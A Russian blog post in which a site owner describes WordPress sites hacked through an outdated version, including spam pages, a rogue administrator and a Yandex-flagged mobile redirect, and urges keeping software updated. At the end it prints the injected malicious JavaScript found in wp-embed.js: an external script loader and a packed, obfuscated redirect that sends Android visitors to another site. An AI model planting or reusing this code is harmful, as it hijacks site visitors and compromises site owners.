Обновляйте свои сайты, всегда обновляйте

В общем мудохаюсь уже третий день.

Сначала взломали часть старых проектов под GGL, которые мирно доживали остатки дней. Причина — старая версия WordPress. Чуваки залили тысячу страниц на сайты, которые даже успели проиндексироваться Гуглом. Но это цветочки. На следующий день я обнаружил, что и трафиковые сайты на одном сервере подверглись нападению киберпреступников.

Причины выясняем. Но скорее всего виноват WordPress. Вчера обнаружил, что на одном сайте появился новый администратор с почтой [email protected] Я тут же его грохнул и сразу же Яндекс начал рапортовать о вредоносном коде на моем сайте. Это был мобильный редирект, как он уже достал. Этот сайт уже второй раз страдает от этой заразы. Если первый раз я был виноват, то во втором случае моей вины нет. Что забавно, Гугл не определил наличие вируса на сайте, просто работает в штатном режиме, Яндекс же больше не показывает сайт в в своей выдаче.

По проблеме нашел такую инфу http://www.cy-pr.com/forum/f80/t81023/ и https://xakep.ru/2015/04/28/wordpress-comments-bug/. Проблема оказывается в комментариях WordPress 4.2, они подвержены XSS взлому.

Короткий вывод — не забрасывайте сайты, обновляйте все вордпрессы, плагины, модули, винду и все остальное, удаляйте ненужные плагины и следите за обновлениями и новостями, если появится какая-то уязвимость про нее начнут писать, а вы должны максимально быстро отреагировать на нее.

В продолжение темы. Вот такой вот код дописали в файл wp-includes/js/wp-embed.js:

document.write('<script type="text/javascript"  src="http://kwizzy.biz/?type=js&key=f53a35769505edf"></script>');
eval(function (p, a, c, k, e, d) {
    e = function (c) {
        return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!''.replace(/^/, String)) {
        while (c--) {
            d[e(c)] = k[c] || e(c)
        }
        k = [function (e) {
            return d[e]
        }];
        e = function () {
            return '\\w+'
        };
        c = 1
    }
    ;
    while (c--) {
        if (k[c]) {
            p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
        }
    }
    return p
}('5 6(b,d,c){4 a="";c&&(a=w x,a.C(a.m()+h*c),a="; j="+a.A());3.8=b+"="+d+a+"; p=/"}5 g(b){b+="=";f(4 d=3.8.s(";"),c=0;c<d.2;c++){f(4 a=d[c];" "==a.k(0);)a=a.e(1,a.2);l(0==a.t(b))7 a.e(b.2,a.2)}7 B}g("9")||(6("9","1",1),y.z.G(/(v)/i)&&(3.F.E="u://n-o.r/q/?D"));', 43, 43, '||length|document|var|function|createCookie|return|cookie|ya|||||substring|for|readCookie|864E5||expires|charAt|if|getTime|validate|js|path|inc|ru|split|indexOf|http|android|new|Date|navigator|userAgent|toGMTString|null|setTime|upd|href|location|match'.split('|'), 0, {}));